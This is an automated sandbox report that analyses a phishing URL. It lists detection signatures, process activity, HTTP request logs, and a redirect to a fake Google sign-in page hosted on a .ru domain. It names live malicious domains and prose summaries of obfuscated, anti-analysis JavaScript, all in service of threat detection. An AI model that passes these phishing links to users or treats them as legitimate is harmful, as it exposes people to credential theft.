Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://52kz793.afratradingagency.com/

Overview

General Information

Sample URL:https://52kz793.afratradingagency.com/
Analysis ID:1577854
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML body contains password input but no form action
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4064 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 --field-trial-handle=1956,i,14440537648066567295,8148106180881864659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://52kz793.afratradingagency.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_144JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://32.ergeane.ru/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: https://32.ergeane.ru/yNriUGk0/Joe Sandbox AI: Score: 9 Reasons: The brand 'Google' is a well-known brand with a legitimate domain of 'google.com'., The URL '32.ergeane.ru' does not match the legitimate domain associated with Google., The domain 'ergeane.ru' is unrelated to Google and appears suspicious., The use of a numerical subdomain '32' is unusual and can be a tactic used in phishing., The domain extension '.ru' is not typically associated with Google, which primarily uses '.com'. DOM: 2.15.pages.csv
    Source: Yara matchFile source: dropped/chromecache_144, type: DROPPED
    Source: https://32.ergeane.ru/yNriUGk0/Joe Sandbox AI: Page contains button: 'Click to continue' Source: '2.3.pages.csv'
    Source: 1.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://32.ergeane.ru/yNriUGk0/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. While the script may have some legitimate functionality, the overall behavior is highly suspicious and requires further investigation.
    Source: 1.52.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://32.ergeane.ru/yNriUGk0/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's system.
    Source: 1.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://32.ergeane.ru/yNriUGk0/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's system.
    Source: 1.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://32.ergeane.ru/yNriUGk0/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-2087237744&timestamp=1734550131587
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-2087237744&timestamp=1734550131587
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-2087237744&timestamp=1734550131587
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-2087237744&timestamp=1734550131587
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: <input type="password" .../> found
    Source: https://52kz793.afratradingagency.com/HTTP Parser: No favicon
    Source: https://52kz793.afratradingagency.com/HTTP Parser: No favicon
    Source: https://32.ergeane.ru/yNriUGk0/HTTP Parser: No favicon
    Source: https://32.ergeane.ru/yNriUGk0/HTTP Parser: No favicon
    Source: https://32.ergeane.ru/yNriUGk0/HTTP Parser: No favicon
    Source: https://32.ergeane.ru/yNriUGk0/HTTP Parser: No favicon
    Source: https://32.ergeane.ru/yNriUGk0/HTTP Parser: No favicon
    Source: https://32.ergeane.ru/yNriUGk0/HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/6130773.htmHTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2F&emr=1&followup=https%3A%2F%2Fdocs.google.com%2F&ifkv=AeZLP985H3miqxWEo0B3XdDKZNAtZFENKF8vhOUkm7ilSRQoSj4F8MJDz16rQeaISGV4WSFyRkfZ6w&osid=1&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1210081361%3A1734550118538962&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 52kz793.afratradingagency.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main.js HTTP/1.1Host: 52kz793.afratradingagency.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main.js HTTP/1.1Host: 52kz793.afratradingagency.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418d689add32ca&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418d689add32ca&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 52kz793.afratradingagency.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://52kz793.afratradingagency.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
